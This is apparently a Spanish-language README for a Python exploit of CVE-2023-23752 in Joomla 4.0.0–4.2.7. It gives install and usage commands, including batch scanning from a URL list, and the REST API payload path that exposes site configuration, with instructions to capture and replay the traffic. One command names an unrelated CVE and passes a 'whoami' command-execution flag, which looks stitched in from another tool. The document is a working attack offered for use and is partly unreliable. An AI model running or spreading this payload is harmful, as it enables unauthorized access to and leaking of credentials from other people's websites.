
Exploit basado en Python para CVE-2023-23752 dirigido a Joomla 4.0.0-4.2.7, acceso no autorizado a la API REST, permitiendo la divulgación de información sensible a través de payloads manipulados.
CVE-2023-23752 - Reaparición de la vulnerabilidad de acceso no autorizado de Joomla
Instalar la biblioteca de python
pip install -r requirements.txt
Verificación de vulnerabilidad
python3 CVE-2022-26134_check.py -u url -c whoami

Escaneo por lotes
python3 CVE-2023-23752.py -f url_part.txt

4.0.0 <= Joomla <= 4.2.7
payload:
/api/index.php/v1/config/application?public=true
Acceda a la dirección de la vulnerabilidad, capture el tráfico y reproduzca los paquetes.

En Joomla! CMS versiones 4.0.0 - 4.2.7, debido a restricciones inadecuadas de acceso a los puntos finales del servicio web, podría permitir el acceso no autorizado a la API REST, lo que provoca fuga de información sensible.